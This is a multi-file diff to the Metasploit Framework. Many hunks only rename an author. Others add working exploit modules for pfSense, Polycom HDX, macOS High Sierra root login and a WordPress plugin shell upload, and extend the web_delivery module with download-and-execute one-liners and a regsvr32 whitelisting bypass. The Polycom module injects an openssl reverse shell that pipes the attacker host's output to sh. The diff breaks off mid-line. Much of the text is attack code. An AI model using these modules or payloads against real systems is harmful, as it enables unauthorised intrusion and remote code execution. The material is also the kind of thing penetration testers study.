--- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote allows direct console access as root or SYSTEM from any source address. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 71b32d439e..be0cd9c9a7 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 9adc1dacb4..c73bbff5f7 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking + include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer @@ -15,22 +16,34 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command will start the specified scripting language interpreter and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. When using either of the PSH targets, ensure the - payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute - x86 payloads on x64 machines. + This module quickly fires up a web server that serves a payload. + The provided command which will allow for a payload to download and execute. + It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe + for bypassing application whitelisting. The main purpose of this module is to quickly establish + a session on a target machine when the attacker has to manually type in the command: + e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. + This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + + When using either of the PSH targets, ensure the payload architecture matches the target computer + or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. + + Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. + The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included + PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) + can occur on the same port. + + "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! + 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! + 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) + 'Trenton Ivey', # AppLocker MSF Module (kn0) + 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features ], 'DefaultOptions' => { @@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => @@ -57,45 +71,114 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['Regsvr32', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), + OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), + ], self.class + ) end + + def primer + php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") + python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") + regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) + + print_status("Run the following command on the target machine:") + case target.name + when 'PHP' + print_line("#{php}") + when 'Python' + print_line("#{python}") + when 'PSH' + psh = gen_psh("#{get_uri}", "string") + print_line("#{psh}") + when 'Regsvr32' + print_line("#{regsvr}") + when 'PSH (Binary)' + psh = gen_psh("#{get_uri}", "download") + print_line("#{psh}") + end + end + + def on_request_uri(cli, _request) - print_status('Delivering Payload') - if target.name.include? 'PSH' + if _request.raw_uri =~ /\.sct$/ + psh = gen_psh("#{get_uri}", "string") + data = gen_sct_file(psh) + elsif target.name.include? 'PSH (Binary)' + data = generate_payload_exe + elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded} ) + data = %Q(#{payload.encoded}) + end + + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering Payload") + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - def primer - url = get_uri - print_status('Run the following command on the target machine:') - case target.name - when 'PHP' - print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when 'Python' - print_line('Python:') - print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") - when 'PSH' + + def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? "$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#{filename}')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file) + end + download_and_run = "#{ignore_cert}#{download_string}" - print_line generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + %{} end end diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb new file mode 100644 index 0000000000..ff11728624 --- /dev/null +++ b/modules/exploits/osx/local/root_no_password.rb @@ -0,0 +1,60 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X Root Privilege Escalation', + 'Description' => %q{ + This module exploits a serious flaw in MacOSX High Sierra. + Any user can login with user "root", leaving an empty password. + }, + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], + [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], + [ 'URL', 'https://forums.developer.apple.com/thread/79235' ], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'Author' => [ + 'chethan177', # earliest public discovery + 'lemiorhan', # making this well-known via Twitter + 'timwr', # Metasploit module + ], + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 29 2017' + )) + end + + def exploit_cmd(root_payload) + "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" + end + + def exploit + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, payload.raw) + register_file_for_cleanup(payload_file) + output = cmd_exec("chmod +x #{payload_file}") + print_status("Executing payload file as '#{payload_file}'") + cmd_exec(exploit_cmd(payload_file)) + end +end diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 983320b10b..1714f4286b 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote to enable remote command execution as the Apache user. By setting SkipEscalation to false, this module will attempt to setuid the bash shell. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_CMD ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/unix/http/pfsense_group_member_exec.rb b/modules/exploits/unix/http/pfsense_group_member_exec.rb new file mode 100644 index 0000000000..ff3708fb89 --- /dev/null +++ b/modules/exploits/unix/http/pfsense_group_member_exec.rb @@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'pfSense authenticated group member RCE', + 'Description' => %q( + pfSense, a free BSD based open source firewall distribution, + version <= 2.3.1_1 contains a remote command execution + vulnerability post authentication in the system_groupmanager.php page. + Verified against 2.2.6 and 2.3. + ), + 'Author' => + [ + 's4squatch', # discovery + 'h00die' # module + ], + 'References' => + [ + [ 'EDB', '43128' ], + [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => + { + 'SSL' => true, + 'PAYLOAD' => 'cmd/unix/reverse_openssl' + }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 06 2017' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']), + Opt::RPORT(443) + ], self.class + ) + end + + def login + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_status("CSRF Token for login: #{csrf}") + + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'POST', + 'vars_post' => { + '__csrf_magic' => csrf, + 'usernamefld' => datastore['USERNAME'], + 'passwordfld' => datastore['PASSWORD'], + 'login' => '' + } + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + if res.code == 302 + vprint_status('Successful Authentication') + return res.get_cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + return nil + end + end + + def detect_version(cookie) + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET', + 'cookie' => cookie + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + /Version.+(?[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body + if version + print_status("pfSense Version Detected: #{version}") + return Gem::Version.new(version) + end + # If the device isn't fully setup, you get stuck at redirects to wizard.php + # however, this does NOT stop exploitation strangely + print_error("pfSens Version Not Detected or wizard still enabled.") + Gem::Version.new('0.0') + end + + def check + begin + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + if /Login to pfSense/ =~ res.body + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + cookie = login + version = detect_version(cookie) + vprint_good('Login Successful') + res = send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'GET', + 'cookie' => cookie, + 'vars_get' => { + 'act' => 'new' + } + ) + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_status("CSRF Token for group creation: #{csrf}") + + group_name = rand_text_alpha(10) + post_vars = { + '__csrf_magic' => csrf, + 'groupname' => group_name, + 'description' => '', + 'members[]' => "0';#{payload.encoded};'", + 'groupid' => '', + 'save' => 'Save' + } + if version >= Gem::Version.new('2.3') + post_vars = post_vars.merge('gtype' => 'local') + elsif version <= Gem::Version.new('2.3') # catch for 2.2.6. left this elsif for easy expansion to other versions as needed + post_vars = post_vars.merge( + 'act' => '', + 'gtype' => '', + 'privid' => '' + ) + end + send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'POST', + 'cookie' => cookie, + 'vars_post' => post_vars, + 'vars_get' => { + 'act' => 'edit' + } + ) + print_status("Manual removal of group #{group_name} is required.") + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb similarity index 83% rename from modules/auxiliary/server/tnftp_savefile.rb rename to modules/exploits/unix/http/tnftp_savefile.rb index bcce71a02b..57e9961e94 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/exploits/unix/http/tnftp_savefile.rb @@ -3,7 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Auxiliary +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report @@ -32,22 +34,13 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 28 2014', 'License' => MSF_LICENSE, - 'Actions' => [ - ['Service'] - ], - 'PassiveActions' => [ - 'Service' - ], - 'DefaultAction' => 'Service' + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => {'BadChars' => '/'}, + 'Targets' => [['ftp(1)', {}]], + 'DefaultTarget' => 0 )) - - register_options([ - OptString.new('CMD', [true, 'Command to run', 'uname -a']) - ]) - end - - def run - exploit end def on_request_uri(cli, request) @@ -59,7 +52,7 @@ class MetasploitModule < Msf::Auxiliary if request.uri.ends_with?(sploit) send_response(cli, '') - print_good("Executing `#{datastore['CMD']}'!") + print_good("Executing `#{payload.encoded}'!") report_vuln( :host => cli.peerhost, :name => self.name, @@ -79,6 +72,6 @@ class MetasploitModule < Msf::Auxiliary end def sploit - "|#{datastore['CMD']}" + "|#{payload.encoded}" end end diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb new file mode 100644 index 0000000000..f95797d672 --- /dev/null +++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb @@ -0,0 +1,177 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Polycom Shell HDX Series Traceroute Command Execution', + 'Description' => %q{ + Within Polycom command shell, a command execution flaw exists in + lan traceroute, one of the dev commands, which allows for an + attacker to execute arbitrary payloads with telnet or openssl. + }, + 'Author' => [ + 'Mumbai', # + 'staaldraad', # https://twitter.com/_staaldraad/ + 'Paul Haas ', # took some of the code from polycom_hdx_auth_bypass + 'h00die ' # stole the code, creds to them + ], + 'References' => [ + ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/'] + ], + 'DisclosureDate' => 'Nov 12 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => [[ 'Automatic', {} ]], + 'Payload' => { + 'Space' => 8000, + 'DisableNops' => true, + 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'} + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RHOST(), + Opt::RPORT(23), + OptString.new('PASSWORD', [ false, "Password to access console interface if required."]), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) + ]) + end + + def check + connect + Rex.sleep(1) + res = sock.get_once + disconnect + if !res && !res.empty? + return Exploit::CheckCode::Unknown + elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/ + return Exploit::CheckCode::Detected + end + Exploit::CheckCode::Unknown + end + + def exploit + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service") + end + + # + # Obtain banner information + # + sock = connect + Rex.sleep(2) + banner = sock.get_once + vprint_status("Received #{banner.length} bytes from service") + vprint_line("#{banner}") + if banner =~ /password/i + print_status("Authentication enabled on device, authenticating with target...") + if datastore['PASSWORD'].nil? + print_error("#{peer} - Please supply a password to authenticate with") + return + end + # couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case. + sock.put("#{datastore['PASSWORD']}\n") + res = sock.get_once + if res =~ /Polycom/ + print_good("#{peer} - Authenticated successfully with target.") + elsif res =~ /failed/ + print_error("#{peer} - Invalid credentials for target.") + return + end + elsif banner =~ /Polycom/ # praise jesus + print_good("#{peer} - Device has no authentication, excellent!") + end + do_payload(sock) + end + + def do_payload(sock) + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n" + sock.put(cmd) + if datastore['VERBOSE'] + Rex.sleep(2) + resp = sock.get_once + vprint_status("Received #{resp.length} bytes in response") + vprint_line(resp) + end + + # Give time for our command to be queued and executed + 1.upto(5) do + Rex.sleep(1) + break if session_created? + end + end + + def stage_final_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + comm = datastore['ListenerComm'] + if comm == 'local' + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => ssl, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self + } + ) + + self.service.on_client_connect_proc = proc { |client| + stage_final_payload(client) + } + + # Start the listening service + self.service.start + end + + # Shut down any running services + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.is_a?(Rex::Service) + if self.service.is_a?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::Exception + end + end + end + + # Accessor for our TCP payload stager + attr_accessor :service +end diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 607df7bbd9..0d661dd5cf 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to v3.1.3 are vulnerable }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index 37d60feb93..fd6bc72760 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 8d63607452..9a4342c20f 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote present when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file (non-default). }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index c338aa0e9f..c60655c7c4 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 351606a391..4c9a2a2821 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'LSO ', # Exploit module - 'patrick', # Added check code, QA tested ok 20090303, there are no references (yet). + 'aushack', # Added check code, QA tested ok 20090303, there are no references (yet). ], 'License' => BSD_LICENSE, 'References' => @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ], ], 'Privileged' => false, - 'Platform' => ['unix'], # patrickw - removed win, linux -> untested + 'Platform' => ['unix'], # aushack - removed win, linux -> untested 'Arch' => ARCH_CMD, 'Payload' => { diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 8badd69c4e..6133669486 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote weakness with non-default server configuration, it is possible to exploit this vulnerability successfully. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 9b2b446dfa..a52dafb445 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote fixed in revision 5166. According to the "tags" within their tree, this corresponds to versions 2.0.4 through 2.0.15 (inclusive). }, - 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ], + 'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index abd6877ae3..46d974a838 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerability occurs within the blog comment functionality, allowing arbitrary files to be deleted. }, - 'Author' => [ 'Matteo Cantoni ', 'patrick' ], + 'Author' => [ 'Matteo Cantoni ', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index a1c4e6bed5..4cd4937c6e 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'Sammy FORGIT', # Vulnerability Discovery, PoC - 'patrick' # Metasploit module + 'aushack' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb new file mode 100644 index 0000000000..3355a7c067 --- /dev/null +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'WordPress WP Mobile Detector 3.5 Shell Upload', + 'Description' => %q{ + WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker + to execute arbitrary PHP code. This flaw exists because the + /wp-content/plugins/wp-mobile-detector/resize.php script does contains a + remote file include for files not cached by the system already. + By uploading a .php file, the remote system will + place the file in a user-accessible path. Making a direct request to the + uploaded file will allow the attacker to execute the script with the privileges + of the web server. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'pluginvulnerabilities.com', # Vulnerability disclosure + 'Aaditya Purani', # EDB module discovered after writing module + 'h00die' # Metasploit module + ], + 'References' => + [ + ['WPVDB', '8505'], + ['EDB', '39891'], + ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'] + ], + 'DisclosureDate' => 'May 31 2016', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wp-mobile-detectory < 3.6', {}]], + 'DefaultTarget' => 0, + 'Stance' => Msf::Exploit::Stance::Aggressive + )) + end + + def check + check_plugin_version_from_readme('wp-mobile-detector', '3.5') + end + + def exploit + payload_name = rand_text_alphanumeric(10) + '.php' + + # First check to see if the file is written already, if it is cache wont retrieve it from us + res = send_request_cgi( + 'global' => true, + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' + ) + if res && !res.body.include?(payload_name) + vprint_status("#{payload_name} verified as not written.") + else + fail_with(Failure::BadConfig,"#{payload_name} already written on system.") + end + + def on_request_uri(cli, _request) + print_good('Payload requested on server, sending') + send_response(cli, payload.encoded) + end + + print_status('Starting Payload Server') + start_service('Path' => "/#{payload_name}") + + print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 